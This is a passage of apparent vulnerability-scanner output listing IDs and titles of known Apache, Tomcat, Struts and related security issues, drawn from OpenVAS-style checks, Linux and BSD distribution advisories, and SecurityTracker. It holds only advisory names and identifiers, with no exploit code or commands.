| [831460] Mandriva Update for apache MDVSA-2011:144 (apache)
| [831449] Mandriva Update for apache MDVSA-2011:130 (apache)
| [831357] Mandriva Update for apache MDVSA-2011:057 (apache)
| [831132] Mandriva Update for apache MDVSA-2010:153 (apache)
| [831131] Mandriva Update for apache MDVSA-2010:152 (apache)
| [830989] Mandriva Update for apache-mod_auth_shadow MDVSA-2010:081 (apache-mod_auth_shadow)
| [830931] Mandriva Update for apache MDVSA-2010:057 (apache)
| [830926] Mandriva Update for apache MDVSA-2010:053 (apache)
| [830918] Mandriva Update for apache-mod_security MDVSA-2010:050 (apache-mod_security)
| [830799] Mandriva Update for apache-conf MDVSA-2009:300-2 (apache-conf)
| [830797] Mandriva Update for apache-conf MDVSA-2009:300-1 (apache-conf)
| [830791] Mandriva Update for apache-conf MDVA-2010:011 (apache-conf)
| [830652] Mandriva Update for apache MDVSA-2008:195 (apache)
| [830621] Mandriva Update for apache-conf MDVA-2008:129 (apache-conf)
| [830581] Mandriva Update for apache MDVSA-2008:016 (apache)
| [830294] Mandriva Update for apache MDKSA-2007:140 (apache)
| [830196] Mandriva Update for apache MDKSA-2007:235 (apache)
| [830112] Mandriva Update for apache MDKSA-2007:127 (apache)
| [830109] Mandriva Update for apache-mod_perl MDKSA-2007:083 (apache-mod_perl)
| [802425] Apache Struts2 Showcase Arbitrary Java Method Execution vulnerability
| [802423] Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities
| [802422] Apache Struts Showcase Multiple Persistence Cross-Site Scripting Vulnerabilities
| [802415] Apache Tomcat Multiple Security Bypass Vulnerabilities (Win)
| [802385] Apache Tomcat Request Object Security Bypass Vulnerability (Win)
| [802384] Apache Tomcat Parameter Handling Denial of Service Vulnerability (Win)
| [802378] Apache Tomcat Hash Collision Denial Of Service Vulnerability
| [801942] Apache Archiva Multiple Vulnerabilities
| [801940] Apache Struts2 'XWork' Information Disclosure Vulnerability
| [801663] Apache Struts2/XWork Remote Command Execution Vulnerability
| [801521] Apache APR-util 'buckets/apr_brigade.c' Denial Of Service Vulnerability
| [801284] Apache Derby Information Disclosure Vulnerability
| [801203] Apache ActiveMQ Persistent Cross-Site Scripting Vulnerability
| [800837] Apache 'mod_deflate' Denial Of Service Vulnerability - July09
| [800827] Apache 'mod_proxy_http.c' Denial Of Service Vulnerability
| [800680] Apache APR Version Detection
| [800679] Apache APR and APR-util Multiple Integer Overflow Vulnerabilities
| [800678] Apache Roller 'q' Parameter Cross Site Scripting Vulnerability
| [800677] Apache Roller Version Detection
| [800279] Apache mod_jk Module Version Detection
| [800278] Apache Struts Cross Site Scripting Vulnerability
| [800277] Apache Tomcat mod_jk Information Disclosure Vulnerability
| [800276] Apache Struts Version Detection
| [800271] Apache Struts Directory Traversal Vulnerability
| [800024] Apache Tomcat RemoteFilterValve Security Bypass Vulnerability
| [103333] Apache HTTP Server 'ap_pregsub()' Function Local Denial of Service Vulnerability
| [103293] Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability
| [103122] Apache Web Server ETag Header Information Disclosure Weakness
| [103074] Apache Continuum Cross Site Scripting Vulnerability
| [103073] Apache Continuum Detection
| [103053] Apache CouchDB Web Administration Interface Cross Site Scripting Vulnerability
| [101023] Apache Open For Business Weak Password security check
| [101020] Apache Open For Business HTML injection vulnerability
| [101019] Apache Open For Business service detection
| [100924] Apache Archiva Cross Site Request Forgery Vulnerability
| [100923] Apache Archiva Detection
| [100858] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
| [100814] Apache Axis2 Document Type Declaration Processing Security Vulnerability
| [100813] Apache Axis2 Detection
| [100797] Apache Traffic Server Remote DNS Cache Poisoning Vulnerability
| [100795] Apache Derby Detection
| [100762] Apache CouchDB Cross Site Request Forgery Vulnerability
| [100725] Apache HTTP Server Multiple Remote Denial of Service Vulnerabilities
| [100613] Apache ActiveMQ 'admin/queueBrowse' Cross Site Scripting Vulnerability
| [100514] Apache Multiple Security Vulnerabilities
| [100211] Apache 'Options' and 'AllowOverride' Directives Security Bypass Vulnerability
| [100172] Apache Web Server Configuration File Environment Variable Local Buffer Overflow Vulnerability
| [100171] Apache Web Server Linefeed Memory Allocation Denial Of Service Vulnerability
| [100130] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
| [72626] Debian Security Advisory DSA 2579-1 (apache2)
| [72612] FreeBSD Ports: apache22
| [71551] Gentoo Security Advisory GLSA 201206-25 (apache)
| [71550] Gentoo Security Advisory GLSA 201206-24 (apache tomcat)
| [71512] FreeBSD Ports: apache
| [71485] Debian Security Advisory DSA 2506-1 (libapache-mod-security)
| [71256] Debian Security Advisory DSA 2452-1 (apache2)
| [71238] Debian Security Advisory DSA 2436-1 (libapache2-mod-fcgid)
| [70737] FreeBSD Ports: apache
| [70724] Debian Security Advisory DSA 2405-1 (apache2)
| [70600] FreeBSD Ports: apache
| [70253] FreeBSD Ports: apache, apache-event, apache-itk, apache-peruser, apache-worker
| [70235] Debian Security Advisory DSA 2298-2 (apache2)
| [70233] Debian Security Advisory DSA 2298-1 (apache2)
| [69988] Debian Security Advisory DSA 2279-1 (libapache2-mod-authnz-external)
| [69338] Debian Security Advisory DSA 2202-1 (apache2)
| [67868] FreeBSD Ports: apache
| [66816] FreeBSD Ports: apache
| [66553] Mandriva Security Advisory MDVSA-2009:189-1 (apache-mod_auth_mysql)
| [66414] Mandriva Security Advisory MDVSA-2009:323 (apache)
| [66106] SuSE Security Advisory SUSE-SA:2009:050 (apache2,libapr1)
| [66081] SLES11: Security update for Apache 2
| [66074] SLES10: Security update for Apache 2
| [66070] SLES9: Security update for Apache 2
| [65998] SLES10: Security update for apache2-mod_python
| [65893] SLES10: Security update for Apache 2
| [65888] SLES10: Security update for Apache 2
| [65575] SLES9: Security update for apache2,apache2-prefork,apache2-worker
| [65510] SLES9: Security update for Apache 2
| [65472] SLES9: Security update for Apache
| [65467] SLES9: Security update for Apache
| [65450] SLES9: Security update for apache2
| [65390] SLES9: Security update for Apache2
| [65363] SLES9: Security update for Apache2
| [65309] SLES9: Security update for Apache and mod_ssl
| [65296] SLES9: Security update for webdav apache module
| [65283] SLES9: Security update for Apache2
| [65249] SLES9: Security update for Apache 2
| [65230] SLES9: Security update for Apache 2
| [65228] SLES9: Security update for Apache 2
| [65212] SLES9: Security update for apache2-mod_python
| [65209] SLES9: Security update for apache2-worker
| [65207] SLES9: Security update for Apache 2
| [65168] SLES9: Security update for apache2-mod_python
| [65142] SLES9: Security update for Apache2
| [65136] SLES9: Security update for Apache 2
| [65132] SLES9: Security update for apache
| [65131] SLES9: Security update for Apache 2 oes/CORE
| [65113] SLES9: Security update for apache2
| [65072] SLES9: Security update for apache and mod_ssl
| [65017] SLES9: Security update for Apache 2
| [64950] Mandrake Security Advisory MDVSA-2009:240 (apache)
| [64783] FreeBSD Ports: apache
| [64774] Ubuntu USN-802-2 (apache2)
| [64653] Ubuntu USN-813-2 (apache2)
| [64559] Debian Security Advisory DSA 1834-2 (apache2)
| [64532] Mandrake Security Advisory MDVSA-2009:189 (apache-mod_auth_mysql)
| [64527] Mandrake Security Advisory MDVSA-2009:184 (apache-mod_security)
| [64526] Mandrake Security Advisory MDVSA-2009:183 (apache-mod_security)
| [64500] Mandrake Security Advisory MDVSA-2009:168 (apache)
| [64443] Ubuntu USN-802-1 (apache2)
| [64426] Gentoo Security Advisory GLSA 200907-04 (apache)
| [64423] Debian Security Advisory DSA 1834-1 (apache2)
| [64391] Mandrake Security Advisory MDVSA-2009:149 (apache)
| [64377] Mandrake Security Advisory MDVSA-2009:124-1 (apache)
| [64251] Debian Security Advisory DSA 1816-1 (apache2)
| [64201] Ubuntu USN-787-1 (apache2)
| [64140] Mandrake Security Advisory MDVSA-2009:124 (apache)
| [64136] Mandrake Security Advisory MDVSA-2009:102 (apache)
| [63565] FreeBSD Ports: apache
| [63562] Ubuntu USN-731-1 (apache2)
| [61381] Gentoo Security Advisory GLSA 200807-06 (apache)
| [61185] FreeBSD Ports: apache
| [60582] Gentoo Security Advisory GLSA 200803-19 (apache)
| [60387] Slackware Advisory SSA:2008-045-02 apache
| [58826] FreeBSD Ports: apache-tomcat
| [58825] FreeBSD Ports: apache-tomcat
| [58804] FreeBSD Ports: apache
| [58745] Gentoo Security Advisory GLSA 200711-06 (apache)
| [58360] Debian Security Advisory DSA 1312-1 (libapache-mod-jk)
| [57851] Gentoo Security Advisory GLSA 200608-01 (apache)
| [57788] Debian Security Advisory DSA 1247-1 (libapache-mod-auth-kerb)
| [57335] Debian Security Advisory DSA 1167-1 (apache)
| [57201] Debian Security Advisory DSA 1131-1 (apache)
| [57200] Debian Security Advisory DSA 1132-1 (apache2)
| [57168] Slackware Advisory SSA:2006-209-01 Apache httpd
| [57145] FreeBSD Ports: apache
| [56731] Slackware Advisory SSA:2006-129-01 Apache httpd
| [56729] Slackware Advisory SSA:2006-130-01 Apache httpd redux
| [56246] Gentoo Security Advisory GLSA 200602-03 (Apache)
| [56212] Debian Security Advisory DSA 952-1 (libapache-auth-ldap)
| [56115] Debian Security Advisory DSA 935-1 (libapache2-mod-auth-pgsql)
| [56067] FreeBSD Ports: apache
| [55803] Slackware Advisory SSA:2005-310-04 apache
| [55519] Debian Security Advisory DSA 839-1 (apachetop)
| [55392] Gentoo Security Advisory GLSA 200509-12 (Apache)
| [55355] FreeBSD Ports: apache
| [55284] Debian Security Advisory DSA 807-1 (libapache-mod-ssl)
| [55261] Debian Security Advisory DSA 805-1 (apache2)
| [55259] Debian Security Advisory DSA 803-1 (apache)
| [55129] Gentoo Security Advisory GLSA 200508-15 (apache)
| [54739] Gentoo Security Advisory GLSA 200411-18 (apache)
| [54724] Gentoo Security Advisory GLSA 200411-03 (apache)
| [54712] Gentoo Security Advisory GLSA 200410-21 (apache)
| [54689] Gentoo Security Advisory GLSA 200409-33 (net=www/apache)
| [54677] Gentoo Security Advisory GLSA 200409-21 (apache)
| [54610] Gentoo Security Advisory GLSA 200407-03 (Apache)
| [54601] Gentoo Security Advisory GLSA 200406-16 (Apache)
| [54590] Gentoo Security Advisory GLSA 200406-05 (Apache)
| [54582] Gentoo Security Advisory GLSA 200405-22 (Apache)
| [54529] Gentoo Security Advisory GLSA 200403-04 (Apache)
| [54499] Gentoo Security Advisory GLSA 200310-04 (Apache)
| [54498] Gentoo Security Advisory GLSA 200310-03 (Apache)
| [54439] FreeBSD Ports: apache
| [53931] Slackware Advisory SSA:2004-133-01 apache
| [53903] Slackware Advisory SSA:2004-299-01 apache, mod_ssl, php
| [53902] Slackware Advisory SSA:2004-305-01 apache+mod_ssl
| [53878] Slackware Advisory SSA:2003-308-01 apache security update
| [53851] Debian Security Advisory DSA 135-1 (libapache-mod-ssl)
| [53849] Debian Security Advisory DSA 132-1 (apache-ssl)
| [53848] Debian Security Advisory DSA 131-1 (apache)
| [53784] Debian Security Advisory DSA 021-1 (apache)
| [53738] Debian Security Advisory DSA 195-1 (apache-perl)
| [53737] Debian Security Advisory DSA 188-1 (apache-ssl)
| [53735] Debian Security Advisory DSA 187-1 (apache)
| [53703] Debian Security Advisory DSA 532-1 (libapache-mod-ssl)
| [53577] Debian Security Advisory DSA 120-1 (libapache-mod-ssl, apache-ssl)
| [53568] Debian Security Advisory DSA 067-1 (apache,apache-ssl)
| [53519] Debian Security Advisory DSA 689-1 (libapache-mod-python)
| [53433] Debian Security Advisory DSA 181-1 (libapache-mod-ssl)
| [53282] Debian Security Advisory DSA 594-1 (apache)
| [53248] Debian Security Advisory DSA 558-1 (libapache-mod-dav)
| [53224] Debian Security Advisory DSA 532-2 (libapache-mod-ssl)
| [53215] Debian Security Advisory DSA 525-1 (apache)
| [53151] Debian Security Advisory DSA 452-1 (libapache-mod-python)
| [52529] FreeBSD Ports: apache+ssl
| [52501] FreeBSD Ports: apache
| [52461] FreeBSD Ports: apache
| [52390] FreeBSD Ports: apache
| [52389] FreeBSD Ports: apache
| [52388] FreeBSD Ports: apache
| [52383] FreeBSD Ports: apache
| [52339] FreeBSD Ports: apache+mod_ssl
| [52331] FreeBSD Ports: apache
| [52329] FreeBSD Ports: ru-apache+mod_ssl
| [52314] FreeBSD Ports: apache
| [52310] FreeBSD Ports: apache
| [15588] Detect Apache HTTPS
| [15555] Apache mod_proxy content-length buffer overflow
| [15554] Apache mod_include priviledge escalation
| [14771] Apache <= 1.3.33 htpasswd local overflow
| [14177] Apache mod_access rule bypass
| [13644] Apache mod_rootme Backdoor
| [12293] Apache Input Header Folding and mod_ssl ssl_io_filter_cleanup DoS Vulnerabilities
| [12280] Apache Connection Blocking Denial of Service
| [12239] Apache Error Log Escape Sequence Injection
| [12123] Apache Tomcat source.jsp malformed request information disclosure
| [12085] Apache Tomcat servlet/JSP container default files
| [11438] Apache Tomcat Directory Listing and File disclosure
| [11204] Apache Tomcat Default Accounts
| [11092] Apache 2.0.39 Win32 directory traversal
| [11046] Apache Tomcat TroubleShooter Servlet Installed
| [11042] Apache Tomcat DOS Device Name XSS
| [11041] Apache Tomcat /servlet Cross Site Scripting
| [10938] Apache Remote Command Execution via .bat files
| [10839] PHP.EXE / Apache Win32 Arbitrary File Reading Vulnerability
| [10773] MacOS X Finder reveals contents of Apache Web files
| [10766] Apache UserDir Sensitive Information Disclosure
| [10756] MacOS X Finder reveals contents of Apache Web directories
| [10752] Apache Auth Module SQL Insertion Attack
| [10704] Apache Directory Listing
| [10678] Apache /server-info accessible
| [10677] Apache /server-status accessible
| [10440] Check for Apache Multiple / vulnerability
|
| SecurityTracker - https://www.securitytracker.com:
| [1028865] Apache Struts Bugs Permit Remote Code Execution and URL Redirection Attacks
| [1028864] Apache Struts Wildcard Matching and Expression Evaluation Bugs Let Remote Users Execute Arbitrary Code
| [1028824] Apache mod_dav_svn URI Processing Flaw Lets Remote Users Deny Service
| [1028823] Apache Unspecified Flaw in mod_session_dbd Has Unspecified Impact
| [1028724] (HP Issues Fix for HP-UX) Apache Web Server Bugs Permit Cross-Site Scripting and Information Disclosure Attacks
| [1028722] (Red Hat Issues Fix for JBoss) Apache Tomcat Lets Remote Users Conduct DIGEST Authentication Replay Attacks
| [1028693] (Red Hat Issues Fix) Apache Tomcat FORM Authenticator Lets Remote Users Conduct Session Fixation Attacks
| [1028622] Apache Struts 'includeParams' Bugs Permit Remote Command Execution and Cross-Site Scripting Attacks
| [1028621] Apache Subversion Bugs Let Remote Authenticated Users Execute Arbitrary Commands and Deny Service
| [1028540] Apache mod_rewrite Input Validation Flaw Lets Remote Users Execute Arbitrary Commands
| [1028534] Apache Tomcat FORM Authenticator Lets Remote Users Conduct Session Fixation Attacks
| [1028533] Apache Tomcat Lack of Chunked Transfer Encoding Extension Size Limit Lets Remote Users Deny Service
| [1028532] Apache Tomcat AsyncListeners Bug May Disclose Information from One Request to Another User
| [1028515] Apache VCL Input Validation Flaw Lets Remote Authenticated Users Gain Elevated Privileges
| [1028457] Apache ActiveMQ Bugs Let Remote Users Conduct Cross-Site Scripting Attacks, Deny Service, and Obtain Potentially Sensitive Information
| [1028287] Apache CXF WSS4JInInterceptor Grants Service Access to Remote Users
| [1028286] Apache CXF WS-Security UsernameToken Processing Flaw Lets Remote Users Bypass Authentication
| [1028252] Apache Commons FileUpload Unsafe Temporary File Lets Local Users Gain Elevated Privileges
| [1028207] Apache Input Validation Bugs Permit Cross-Site Scripting Attacks
| [1027836] Apache Tomcat Connection Processing Bug Lets Remote Users Deny Service
| [1027834] Apache Tomcat Bug Lets Remote Users Bypass Cross-Site Request Forgery Prevention Filter
| [1027833] Apache Tomcat Bug Lets Remote Users Bypass Security Constraints
| [1027729] Apache Tomcat Header Processing Bug Lets Remote Users Deny Service
| [1027728] Apache Tomcat Lets Remote Users Conduct DIGEST Authentication Replay Attacks
| [1027554] Apache CXF Lets Remote Authenticated Users Execute Unauthorized SOAP Actions
| [1027508] Apache Wicket Input Validation Flaw Permits Cross-Site Scripting Attacks
| [1027421] Apache Web Server Bugs Permit Cross-Site Scripting and Information Disclosure Attacks
| [1027096] Apache Commons Compress BZip2CompressorOutputStream() Sorting Algorithm Lets Remote or Local Users Deny Service
| [1026932] Apache LD_LIBRARY_PATH Processing Lets Local Users Gain Elevated Privileges
| [1026928] Apache OFBiz Unspecified Flaw Lets Remote Users Execute Arbitrary Code
| [1026927] Apache OFBiz Input Validation Flaws Permit Cross-Site Scripting Attacks
| [1026847] Apache Traffic Server Host Header Processing Flaw Lets Remote Users Deny Service
| [1026846] Apache Wicket Discloses Hidden Application Files to Remote Users
| [1026839] Apache Wicket Input Validation Flaw in 'wicket:pageMapName' Parameter Permits Cross-Site Scripting Attacks
| [1026616] Apache Bugs Let Remote Users Deny Service and Obtain Cookie Data
| [1026575] Apache Struts ParameterInterceptor() Flaw Lets Remote Users Execute Arbitrary Commands
| [1026484] Apache Struts Bug Lets Remote Users Overwrite Files and Execute Arbitrary Code
| [1026477] Apache Tomcat Hash Table Collision Bug Lets Remote Users Deny Service
| [1026402] Apache Struts Conversion Error Lets Remote Users Inject Arbitrary Commands
| [1026353] Apache mod_proxy/mod_rewrite Bug Lets Remote Users Access Internal Servers
| [1026295] Apache Tomcat Lets Untrusted Web Applications Gain Elevated Privileges
| [1026267] Apache .htaccess File Integer Overflow Lets Local Users Execute Arbitrary Code
| [1026144] Apache mod_proxy Pattern Matching Bug Lets Remote Users Access Internal Servers
| [1026095] Apache Tomcat HTTP DIGEST Authentication Weaknesses Let Remote Users Conduct Bypass Attacks
| [1026054] Apache mod_proxy_ajp HTTP Processing Error Lets Remote Users Deny Service
| [1025993] Apache Tomcat AJP Protocol Processing Bug Lets Remote Users Bypass Authentication or Obtain Information
| [1025976] Apache Wicket Input Validation Flaw Permits Cross-Site Scripting Attacks
| [1025960] Apache httpd Byterange Filter Processing Error Lets Remote Users Deny Service
| [1025925] Apache Tomcat Commons Daemon jsvc Lets Local Users Gain Elevated Privileges
| [1025924] Apache Tomcat XML Validation Flaw Lets Applications Obtain Potentially Sensitive Information
| [1025788] Apache Tomcat Lets Malicious Applications Obtain Information and Deny Service
| [1025755] Apache Santuario Buffer Overflow Lets Remote Users Deny Service
| [1025712] Apache Tomcat Discloses Passwords to Local Users in Certain Cases
| [1025577] Apache Archiva Input Validation Hole Permits Cross-Site Scripting Attacks
| [1025576] Apache Archiva Request Validation Flaw Permits Cross-Site Request Forgery Attacks
| [1025527] Apache APR Library apr_fnmatch() Flaw Lets Remote Users Execute Arbitrary Code
| [1025303] Apache Tomcat HTTP BIO Connector Error Discloses Information From Different Requests to Remote Users
| [1025215] Apache Tomcat May Ignore @ServletSecurity Annotation Protections
| [1025066] Apache Continuum Input Validation Flaw Permits Cross-Site Request Forgery Attacks
| [1025065] Apache Continuum Input Validation Hole Permits Cross-Site Scripting Attacks
| [1025027] Apache Tomcat maxHttpHeaderSize Parsing Error Lets Remote Users Deny Service
| [1025026] Apache Tomcat Manager Input Validation Hole Permits Cross-Site Scripting Attacks
| [1025025] Apache Tomcat Security Manager Lets Local Users Bypass File Permissions
| [1024764] Apache Tomcat Manager Input Validation Hole in 'sessionList.jsp' Permits Cross-Site Scripting Attacks
| [1024417] Apache Traffic Server Insufficient Randomization Lets Remote Users Poison the DNS Cache
| [1024332] Apache mod_cache and mod_dav Request Processing Flaw Lets Remote Users Deny Service
| [1024180] Apache Tomcat 'Transfer-Encoding' Header Processing Flaw Lets Remote Users Deny Service and Obtain Potentially Sensitive Information
| [1024096] Apache mod_proxy_http May Return Results for a Different Request
| [1023942] Apache mod_proxy_ajp Error Condition Lets Remote Users Deny Service
| [1023941] Apache ap_read_request() Memory Error May Let Remote Users Access Potentially Sensitive Information
| [1023778] Apache ActiveMQ Input Validation Flaw Permits Cross-Site Scripting Attacks
| [1023701] Apache mod_isapi Error Processing Flaw May Let Remote Users Deny Service
| [1023533] Apache mod_proxy Integer Overflow May Let Remote Users Execute Arbitrary Code
| [1022988] Apache Solaris Support Code Bug Lets Remote Users Deny Service
| [1022529] Apache mod_deflate Connection State Bug Lets Remote Users Deny Service
| [1022509] Apache mod_proxy stream_reqbody_cl() Infinite Loop Lets Remote Users Deny Service
| [1022296] Apache IncludesNoExec Options Restrictions Can Be Bypass By Local Users
| [1022264] Apache mod_proxy_ajp Bug May Disclose Another User's Response Data
| [1022001] Apache Tomcat mod_jk May Disclose Responses to the Wrong User
| [1021988] mod_perl Input Validation Flaw in Apache::Status and Apache2::Status Permits Cross-Site Scripting Attacks
| [1021350] NetWare Bug Lets Remote Users Access the ApacheAdmin Console
| [1020635] Apache Input Validation Hole in mod_proxy_ftp Permits Cross-Site Scripting Attacks
| [1020520] Oracle WebLogic Apache Connector Lets Remote Users Execute Arbitrary Code
| [1020267] Apache mod_proxy Interim Response Process Bug Lets Remote Users Deny Service
| [1019784] Apache-SSL Certificate Processing Bug May Let Remote Users View Portions of Kernel Memory
| [1019256] Apache mod_negotiation Input Validation Hole Permits Cross-Site Scripting Attacks
| [1019194] Apache Input Validation Hole in Mod_AutoIndex When the Character Set is Undefined May Permit Cross-Site Scripting Attacks
| [1019185] Apache Input Validation Hole in mod_proxy_ftp Permits Cross-Site Scripting Attacks
| [1019154] Apache Input Validation Hole in mod_status Permits Cross-Site Scripting Attacks
| [1019093] Apache Input Validation Hole in mod_imap Permits Cross-Site Scripting Attacks
| [1019030] Apache Input Validation Hole in Default HTTP 413 Error Page Permits Cross-Site Scripting Attacks
| [1018633] Apache mod_proxy Bug Lets Remote Users Deny Service
| [1018304] Apache HTTPD scoreboard Protection Flaw Lets Local Users Terminate Arbitrary Processes
| [1018303] Apache HTTPD mod_cache May Let Remote Users Deny Service
| [1018302] Apache mod_status Input Validation Hole Permits Cross-Site Scripting Attacks
| [1018269] Apache Tomcat Input Validation Hole in Processing Accept-Language Header Permits Cross-Site Scripting Attacks
| [1017904] Apache suEXEC Bugs May Let Local Users Gain Elevated Privileges
| [1017719] Apache Tomcat JK Web Server Connector Buffer Overflow in map_uri_to_worker() Lets Remote Users Execute Arbitrary Code
| [1017062] Apache mod_tcl Format String Bug in set_var() Function May Let Remote Users Execute Arbitrary Code
| [1016601] Apache mod_rewrite Off-by-one Error Lets Remote Users Execute Arbitrary Code
| [1016576] Apache Tomcat Discloses Directory Listings to Remote Users
| [1015447] Apache mod_ssl Null Pointer Dereference May Let Remote Users Deny Service
| [1015344] Apache mod_imap Input Validation Flaw in Referer Field Lets Remote Users Conduct Cross-Site Scripting Attacks
| [1015093] Apache Memory Leak in MPM 'worker.c' Code May Let Remote Users Deny Service
| [1014996] ApacheTop Unsafe Temporary File May Let Local Users Gain Elevated Privileges
| [1014833] Apache ssl_hook_Access() Function May Fail to Verify Client Certificates
| [1014826] Apache Memory Leak in 'byterange filter' Lets Remote Users Deny Service
| [1014575] Apache mod_ssl Off-by-one Buffer Overflow in Processing CRLs May Let Remote Users Deny Service
| [1014323] Apache Chunked Transfer-Encoding and Content-Length Processing Lets Remote Users Smuggle HTTP Requests
| [1013156] Apache mod_python Publisher Handler Discloses Information to Remote Users
| [1012829] Apache mod_auth_radius radcpy() Integer Overflow Lets Remote Users Deny Service in Certain Cases
| [1012416] Apache on Apple OS X Lets Remote Users Bypass Apache File Handlers and Directly Access Files
| [1012415] Apache on Apple HFS+ Filesystems May Disclose '.DS_Store' Files to Remote Users
| [1012414] Apache mod_digest_apple Lets Remote Users Replay Authentication Credentials
| [1012083] Apache Web Server Error in Processing Requests With Many Space Characters Lets Remote Users Deny Service
| [1011783] Apache mod_include Buffer Overflow Lets Local Users Execute Arbitrary Code
| [1011557] Apache mod_ssl SSLCipherSuite Directive Can By Bypassed in Certain Cases
| [1011385] Apache Satsify Directive Error May Let Remote Users Access Restricted Resources
| [1011340] Apache SSL Connection Abort State Error Lets Remote Users Deny Service
| [1011303] Apache ap_resolve_env() Buffer Overflow in Reading Configuration Files May Let Local Users Gain Elevated Privileges
| [1011299] Apache IPv6 Address Parsing Flaw May Let Remote Users Deny Service
| [1011248] Apache mod_dav LOCK Method Error May Let Remote Users Deny Service
| [1011213] Apache mod_ssl Can Be Crashed By Remote Users When Reverse Proxying SSL Connections
| [1010674] Apache Can Be Crashed By PHP Code Invoking Nested Remote Sockets
| [1010599] Apache httpd Header Line Memory Allocation Lets Remote Users Crash the Server
| [1010462] Apache mod_proxy Buffer Overflow May Let Remote Users Execute Arbitrary Code
| [1010322] Apache mod_ssl Stack Overflow in ssl_util_uuencode_binary() May Let Remote Users Execute Arbitrary Code
| [1010270] cPanel Apache mod_phpsuexec Options Let Local Users Gain Elevated Privileges
| [1009934] Apache Web Server Has Buffer Overflow in ebcdic2ascii() on Older Processor Architectures
| [1009516] Apache mod_survey HTML Report Format Lets Remote Users Conduct Cross-Site Scripting Attacks
16629| [1009509] Apache mod_disk_cache Stores Authentication Credentials on Disk
16630| [1009495] Apache Web Server Socket Starvation Flaw May Let Remote Users Deny Service
16631| [1009417] GroupWise WebAccess With Apache on NetWare Has Configuration Flaw That May Grant Web Access to Remote Users
16632| [1009338] Apache mod_access Parsing Flaw May Fail to Enforce Allow/Deny Rules
16633| [1009337] Apache mod_ssl Memory Leak Lets Remote Users Crash the Daemon
16634| [1009182] Apache for Cygwin '..%5C' Input Validation Flaw Discloses Files to Remote Users
16635| [1008973] PHP May Apply Incorrect php_admin_* Settings To Requests for Apache Virtual Hosts
16636| [1008967] Apache-SSL 'SSLFakeBasicAuth' Lets Remote Users Forge Client Certificates to Be Authenticated
16637| [1008920] Apache mod_digest May Validate Replayed Client Responses
16638| [1008828] Apache mod_python String Processing Bug Still Lets Remote Users Crash the Web Server
16639| [1008822] Apache mod_perl File Descriptor Leak May Let Local Users Hijack the http and https Services
16640| [1008675] mod_auth_shadow Apache Module Authenticates Expired Passwords
16641| [1008559] Apache mod_php File Descriptor Leak May Let Local Users Hijack the https Service
16642| [1008335] Apache mod_python String Processing Bug Lets Remote Users Crash the Web Server
16643| [1008196] Apache 2.x on Windows May Return Unexpected Files For URLs Ending With Certain Characters
16644| [1008030] Apache mod_rewrite Contains a Buffer Overflow
16645| [1008029] Apache mod_alias Contains a Buffer Overflow
16646| [1008028] Apache mod_cgid May Disclose CGI Output to Another Client
16647| [1007995] Apache Cocoon Forms May Let Remote Users Execute Arbitrary Java Code on the System
16648| [1007993] Apache Cocoon 'view-source' Sample Script Discloses Files to Remote Users
16649| [1007823] Apache Web Server mod_cgi Error May Let Malicious CGI Scripts Crash the Web Service
16650| [1007664] Apache::Gallery Unsafe Temporary Files May Let Local Users Gain Apache Web Server Privileges
16651| [1007557] Apache Web Server Does Not Filter Terminal Escape Sequences From Log Files
16652| [1007230] Apache HTTP Server 'rotatelogs' Bug on Win32 and OS/2 May Cause the Logging to Stop
16653| [1007146] Apache HTTP Server FTP Proxy Bug May Cause Denial of Service Conditions
16654| [1007145] Apache 'accept()' Errors May Cause Denial of Service Conditions
16655| [1007144] Apache Web Server 'type-map' File Error Permits Local Denial of Service Attacks
16656| [1007143] Apache 2.0 Web Server May Use a Weaker Encryption Implementation Than Specified in Some Cases
16657| [1006864] Apache Web Server Can Be Crashed By Remote Users Via mod_dav Flaws and Also Via Basic Authentication
16658| [1006709] Apache mod_survey Input Validation Flaw Lets Remote Users Fill Up Disk Space
16659| [1006614] Apache mod_ntlm Buffer Overflow and Format String Flaw Let Remote Users Execute Arbitary Code
16660| [1006591] Apache mod_access_referer Module Null Pointer Dereference May Faciliate Denial of Service Attacks
16661| [1006444] Apache 2.0 Web Server Line Feed Buffer Allocation Flaw Lets Remote Users Deny Service
16662| [1006021] Apache Tomcat Server URL Parsing Error May Disclose Otherwise Inaccessible Web Directory Listings and Files to Remote Users
16663| [1005963] Apache Web Server 2.x Windows Device Access Flaw Lets Remote Users Crash the Server or Possibly Execute Arbitrary Code
16664| [1005962] Apache Web Server Path Parsing Flaw May Allow Remote Users to Execute Code in Certain Configurations
16665| [1005848] Apache 'printenv' Script Input Validation Bugs in Older Versions May Let Remote Users Conduct Cross-Site Scripting Attacks
16666| [1005765] Apache mod_jk Module Processing Bug When Used With Tomcat May Disclose Information to Remote Users or Crash
16667| [1005548] Apache mod_php Module May Allow Local Users to Gain Control of the Web Port
16668| [1005499] Apache Web Server (2.0.42) May Disclose CGI Source Code to Remote Users When Used With WebDAV
16669| [1005410] Apache Tomcat Java Servlet Engine Can Be Crashed Via Multiple Requests for DOS Device Names
16670| [1005351] Apache Web Server (1.3.x) Shared Memory Scoreboard Bug Lets Certain Local Users Issue Signals With Root Privileges
16671| [1005331] Apache Web Server (2.x) SSI Server Signature Filtering Hole Lets Remote Users Conduct Cross-Site Scripting Attacks
16672| [1005290] Apache Tomcat Java Server Default Servlet Returns JSP Source Code to Remote Users
16673| [1005285] Apache Web Server 'mod_dav' Has Null Pointer Bug That May Allow Remote Users to Cause Denial of Service Conditions
16674| [1005010] Apache Web Server (2.0) Has Unspecified Flaw That Allows Remote Users to Obtain Sensitive Data and Cause Denial of Service Conditions
16675| [1004770] Apache 2.x Web Server ap_log_rerror() Function May Disclose Full Installation Path to Remote Users
16676| [1004745] Apache Tomcat Java Server Allows Cross-Site Scripting Attacks
16677| [1004636] Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code
16678| [1004602] Apache Tomcat Java Server for Windows Can Be Crashed By Remote Users Sending Malicious Requests to Hang All Available Working Threads
16679| [1004586] Apache Tomcat Java Server May Disclose the Installation Path to Remote Users
16680| [1004555] Apache Web Server Chunked Encoding Flaw May Let Remote Users Execute Arbitrary Code on the Server
16681| [1004209] Apache 'mod_python' Python Language Interpreter Bug in Publisher Handler May Allow Remote Users to Modify Files on the System
